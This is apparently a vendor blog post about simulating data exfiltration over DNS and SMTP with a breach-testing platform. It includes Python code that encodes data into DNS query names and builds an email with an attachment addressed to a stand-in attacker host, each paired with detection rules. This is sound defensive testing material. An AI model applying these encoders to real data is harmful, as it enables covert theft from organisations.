Simulating Data Exfiltration with Nemesis
- Markus Vervier
- May 15
- 5 min read
In today's threat landscape, cybersecurity teams face a critical challenge: preventing sensitive data from leaving their networks through unauthorized channels. This process, known as data exfiltration, is a primary objective for threat actors. While organizations invest heavily in prevention mechanisms, how can they be certain these controls work effectively without testing them in real-world scenarios?
Enter Nemesis, our comprehensive breach and attack simulation platform, and its specialized data exfiltration testing suite, Medusa. Nemesis allows security teams to safely simulate data theft attempts across various protocols, providing actionable insights without risking actual data compromise:
Ensuring your Data Loss Prevention tools actually detect and block suspicious outbound traffic.
Confirming your SOC can identify unusual data movement patterns across different protocols, and fine-tuning its ability to detect and react to exfiltration attempts in real time.
Discovering which exfiltration channels might be overlooked by your current security stack.
Attackers frequently hide stolen data in standard protocols that are allowed out of almost every network: SMTP (email), DNS (name resolution), HTTP/HTTPS or FTP. A number of data exfiltration techniques using these protocols are available in Nemesis by default:

Advanced Testing Capabilities: Flexible Data Sizes and Time-Based Simulations
One of Nemesis' most powerful features is its ability to simulate real-world adversary behavior through fine-grained customization of exfiltration parameters, all of which are set in a single configuration step:

Arbitrary Data Size Testing
Unlike basic testing tools that send a fixed-size payload, Nemesis lets you precisely calibrate how much data is exfiltrated and how often it is sent:
Micro-exfiltration Detection: Test your controls against the exfiltration of small data chunks (kilobytes of data) that often fly under the radar of traditional DLP solutions
Large-scale Data Theft Simulation: Validate your controls can detect the theft of gigabytes of data exfiltrated over one or multiple protocols, with variable delays
Data Type Simulation: Configure simulations to mimic the exfiltration of specific data types like auto-generated credit card numbers, social security numbers, or any custom file — allowing you to test data-aware security controls over plaintext and encrypted protocols.
One Nemesis customer discovered that while their security tools detected large exfiltration attempts, they consistently missed smaller, more frequent transfers that stayed under the default per-event thresholds. This gap was identified specifically through a Nemesis exfiltration simulation.
Time-Based Exfiltration Testing
Modern attackers rarely execute data theft in a single operation. Instead, they employ sophisticated timing techniques to evade detection:
Scheduled Exfiltration: Set up tests to run at specific times or intervals, testing your round-the-clock monitoring capabilities
Delayed Execution: Configure simulations that activate hours or days after initial setup, mimicking dormant malware behavior
Interval-Based Testing: Simulate persistent attackers who extract small amounts of data at regular intervals over extended periods
Business-Hours Alignment: Test whether your SOC is equally effective at detecting exfiltration during business hours versus overnight or weekend periods
A financial services client used Medusa's delayed execution testing to discover that their nighttime SOC rotation had significantly longer detection times for subtle data exfiltration techniques—a gap they were able to address through additional training.
Real-World APT Exfiltration Techniques
Recent advanced persistent threat (APT) campaigns demonstrate why testing for exfiltration techniques is not just theoretical but essential for modern security postures:
APT29 (Cozy Bear)
This Russia-linked threat actor, active as recently as mid-2024, has refined their DNS exfiltration techniques to evade detection. Their operations against government and diplomatic targets utilized a sophisticated DNS tunneling mechanism that fragmented stolen data into micro-chunks embedded in DNS requests. The DNS requests were timed to mimic normal network traffic patterns, making them extremely difficult to distinguish from legitimate traffic.
Security researchers identified these exfiltration attempts only after significant delays, as the DNS requests were deliberately designed to stay below volume thresholds that would trigger alerts. Nemesis Medusa can simulate these exact patterns to validate whether your security controls would detect similar sophisticated attempts.
APT40 (Bronze Mohawk)
Operating with a focus on maritime industries and research institutions, this group has implemented a multi-protocol approach to data exfiltration. In campaigns observed through mid-2024, they established redundant exfiltration channels using both DNS and SMTP protocols.
Their most notable innovation was implementing "protocol hopping" where data theft would automatically switch between different protocols when resistance was encountered. For example, if DNS exfiltration was blocked, their malware would seamlessly switch to HTTPS or even FTP fallbacks without requiring additional command and control instructions. This resilient approach meant that blocking a single channel was insufficient to prevent data loss. With Nemesis Medusa, these sophisticated protocol-hopping techniques can be simulated to ensure your organization's defenses address all potential avenues of exfiltration.
Exfiltrating Data with Nemesis
Medusa simulates the techniques used by actual threat actors to extract data from your network. It creates controlled, non-malicious simulations that mimic real exfiltration attempts, allowing you to test your defenses without risk.
The following illustrates data exfiltration techniques using DNS and SMTP/S. However, Medusa provides the flexibility to exfiltrate data over various other protocols, including HTTP, HTTPS, FTP, and FTPS.
DNS Exfiltration
Exfiltrating over DNS remains one of the most elusive exfiltration techniques because it leverages a protocol that's rarely blocked or analyzed at network boundaries.
This simulation encodes data into DNS queries for names under the Nemesis-controlled domain nemesis.services, where the Medusa handlers are listening, mimicking how attackers extract small chunks of data through seemingly legitimate DNS traffic. Your security controls should detect the unusual pattern: oversized, high-entropy query names sent at high frequency, all for a single domain.
The screenshot below shows the Nemesis Medusa logs at the top and, at the bottom, Wireshark running on the Windows 11 machine that runs the Nemesis agent. The long A-record queries to the nemesis.services domain, carrying the encoded data, are clearly visible.
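The query encoding described above, together with the threshold gap from the customer example earlier (small chunks that stay under a per-event limit), as an added example that is not Nemesis or Medusa code: it encodes a payload into query names under nemesis.services, decodes them the way a handler would, and runs two detection rules over constructed resolver logs. The chunk sizes, thresholds, source addresses and log lines are assumptions made for the example.

```python
from __future__ import annotations

import base64
from collections import defaultdict

# Added example, not Nemesis/Medusa code. The handler domain is the one the
# post names; chunk sizes, thresholds, source IPs and log lines are constructed.
EXFIL_DOMAIN = "nemesis.services"
MAX_LABEL = 63    # RFC 1035: a label is at most 63 octets
MAX_NAME = 253    # practical limit for a whole name in presentation form


def encode_chunks(data: bytes, chunk_size: int) -> list[str]:
    """Agent side: split data into chunks, base32-encode each chunk (DNS names
    are case-insensitive, so base64 would be corrupted by resolvers), cut the
    encoding into labels of at most 63 characters and prefix a sequence number
    so the handler can reorder queries that arrive out of order. One name per
    query."""
    names = []
    for seq, off in enumerate(range(0, len(data), chunk_size)):
        enc = base64.b32encode(data[off:off + chunk_size]).decode().rstrip("=").lower()
        labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
        name = ".".join([str(seq), *labels, EXFIL_DOMAIN])
        if len(name) > MAX_NAME:
            raise ValueError(f"chunk_size {chunk_size} does not fit in one query name")
        names.append(name)
    return names


def decode_chunks(names: list[str]) -> bytes:
    """Handler side: strip the domain, join the payload labels, restore the
    base32 padding and reassemble the chunks in sequence order."""
    parts = {}
    for name in names:
        labels = name[: -len(EXFIL_DOMAIN) - 1].split(".")
        enc = "".join(labels[1:]).upper()
        enc += "=" * (-len(enc) % 8)
        parts[int(labels[0])] = base64.b32decode(enc)
    return b"".join(parts[i] for i in sorted(parts))


def registered_domain(qname: str) -> str:
    """Crude last-two-labels approximation; use a public-suffix list in practice."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def flag_per_query(log, name_threshold: int = 100) -> list[str]:
    """Per-event rule: alert on any single query name longer than the threshold.
    This is the kind of rule the post's customer found insufficient."""
    return [q for _, _, q in log if len(q) > name_threshold]


def flag_per_source(log, window_s: int = 60, byte_threshold: int = 800) -> dict:
    """Volume-over-time rule: sum query-name bytes per (source, domain, window)
    and alert when the sum crosses the threshold, however small each query is."""
    buckets = defaultdict(int)
    for ts, src, q in log:
        buckets[(src, registered_domain(q), ts // window_s)] += len(q)
    return {k: v for k, v in buckets.items() if v > byte_threshold}


def build_logs(secret: bytes):
    """Constructed resolver logs as (timestamp_s, source_ip, qname) tuples: a
    micro run (16 bytes per query) and a bulk run (128 bytes per query) from
    10.0.0.5, each mixed with ordinary lookups from 10.0.0.7."""
    benign = [(5, "10.0.0.7", "www.example.com"),
              (20, "10.0.0.7", "login.microsoftonline.com"),
              (40, "10.0.0.7", "ctldl.windowsupdate.com")]
    micro = [(i, "10.0.0.5", q) for i, q in enumerate(encode_chunks(secret, 16))]
    bulk = [(i, "10.0.0.5", q) for i, q in enumerate(encode_chunks(secret, 128))]
    return sorted(micro + benign), sorted(bulk + benign)


if __name__ == "__main__":
    secret = bytes(range(256)) * 2  # 512 constructed payload bytes
    micro_log, bulk_log = build_logs(secret)
    agent_queries = [q for _, src, q in micro_log if src == "10.0.0.5"]
    print("handler round trip:", decode_chunks(agent_queries) == secret)
    print("per-query rule  micro:", len(flag_per_query(micro_log)), "alerts;",
          "bulk:", len(flag_per_query(bulk_log)), "alerts")
    print("per-source rule micro:", flag_per_source(micro_log))
    print("per-source rule bulk: ", flag_per_source(bulk_log))
```

With 16-byte chunks every query name is about 46 characters, so the length rule never fires, while the same 512 bytes spread over 32 queries in one minute crosses the per-source volume rule comfortably; with 128-byte chunks both rules fire. Tuning the per-source window and threshold against your own resolver logs is the exercise the simulation is meant to drive.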

SMTP/S Exfiltration
Email remains a common vector for data theft, with sensitive information hidden in attachments or even the body of messages.
This test attempts to exfiltrate data by embedding it in attachments sent via email over plaintext SMTP, testing your email gateway's ability to analyze outbound content for sensitive information patterns.
The screenshot below shows the raw SMTP traffic going out of the network and being intercepted with Wireshark. Note the email MIME multipart section where the data is exfiltrated.
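As an added example (not Nemesis or Medusa code) covering both the synthetic card-number payloads mentioned earlier and the attachment exfiltration shown here: it generates Luhn-valid test PANs, builds the multipart message an agent would hand to the SMTP server, and contrasts a regex run over the raw wire bytes, which sees only base64 for the attachment, with a gateway that decodes each MIME part before scanning. The addresses, file name, random seed and document content are constructed for the example.

```python
from __future__ import annotations

import email
import random
import re
from email import policy
from email.message import EmailMessage

# Added example, not Nemesis/Medusa code. Addresses, attachment name, seed and
# document content are constructed; the card numbers are generated here and
# pass the Luhn check but are not real accounts.


def luhn_valid(digits: str) -> bool:
    """Standard Luhn mod-10 check over a string of digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                 # every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def synthetic_pan(rng: random.Random, prefix: str = "4", length: int = 16) -> str:
    """Generate a Luhn-valid test PAN: random body plus the one check digit
    that makes it validate."""
    body = prefix + "".join(rng.choices("0123456789", k=length - len(prefix) - 1))
    return next(body + d for d in "0123456789" if luhn_valid(body + d))


def sample_document(rng: random.Random, rows: int = 3) -> tuple[bytes, list[str]]:
    """Constructed CSV 'export' with the PANs written in 4-digit groups."""
    pans = [synthetic_pan(rng) for _ in range(rows)]
    lines = ["customer,card"] + [
        f"cust{i},{p[:4]} {p[4:8]} {p[8:12]} {p[12:]}" for i, p in enumerate(pans)
    ]
    return "\n".join(lines).encode(), pans


def build_exfil_message(attachment: bytes, filename: str) -> bytes:
    """Agent side: the multipart message handed to the SMTP server. The
    attachment is base64 on the wire, which is what the capture shows in the
    MIME section."""
    msg = EmailMessage()
    msg["From"] = "workstation@corp.example"
    msg["To"] = "dropbox@attacker.example"
    msg["Subject"] = "Q2 figures"
    msg.set_content("Please find the export attached.")
    msg.add_attachment(attachment, maintype="application", subtype="octet-stream",
                       filename=filename)
    msg.set_boundary("constructed.mime.boundary")   # fixed for reproducibility
    return msg.as_bytes()


# 13 to 19 digits with optional single space/hyphen separators, not part of a
# longer digit run. The Luhn filter below removes most false positives.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){13,19}(?!\d)")


def find_pans(text: str) -> list[str]:
    hits = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            hits.append(digits)
    return hits


def naive_scan(raw: bytes) -> list[str]:
    """A regex over the raw SMTP DATA bytes: the attachment is base64 here."""
    return find_pans(raw.decode("utf-8", "replace"))


def inspect_outbound(raw: bytes) -> dict[str, list[str]]:
    """Gateway side: parse the message, walk every leaf MIME part, undo its
    transfer encoding and scan the decoded content."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = {}
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""
        pans = find_pans(payload.decode("utf-8", "replace"))
        if pans:
            findings[part.get_filename() or part.get_content_type()] = pans
    return findings


def run_demo(seed: int = 7) -> dict:
    doc, pans = sample_document(random.Random(seed))
    raw = build_exfil_message(doc, "export.csv")
    return {"pans": pans, "raw": raw, "naive": naive_scan(raw),
            "gateway": inspect_outbound(raw)}


if __name__ == "__main__":
    r = run_demo()
    print(r["raw"].decode())
    print("regex over wire bytes :", r["naive"])
    print("gateway after decoding:", r["gateway"])
```

The same decode-then-scan step is what a gateway has to do for every transfer encoding and container it accepts (base64, quoted-printable, nested multipart, archives); the simulation is only useful if the gateway in front of the agent actually gets the plaintext body, which is why the STARTTLS variant below matters.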

To make things harder for network traffic analysis, an attacker would exfiltrate over an encrypted channel instead: either plaintext SMTP upgraded with STARTTLS, or implicit-TLS SMTPS on port 465. In the STARTTLS case the EHLO exchange and the STARTTLS command are still visible in the clear, as in the screenshot below, but everything after the TLS handshake, including the MIME body, is not; a gateway can then only inspect the content if it terminates the TLS session itself or is the relay the agent submits to:

Nemesis provides comprehensive results for each simulated data exfiltration method. This includes details on timing and, if network traffic blocking prevents successful exfiltration, information regarding the prevention measures.

Conclusions
The repeatability and customization options of Nemesis Medusa's testing capabilities, from arbitrary data sizes and types to scheduled and delayed exfiltration simulations, provide unprecedented visibility into your organization's ability to detect and prevent data theft. This level of continuous validation is essential not just for technical security, but also for regulatory compliance.
Data exfiltration techniques keep growing more sophisticated; shouldn't your testing methods evolve with them? Contact us today to learn how Nemesis can strengthen your organization's defense against data exfiltration threats.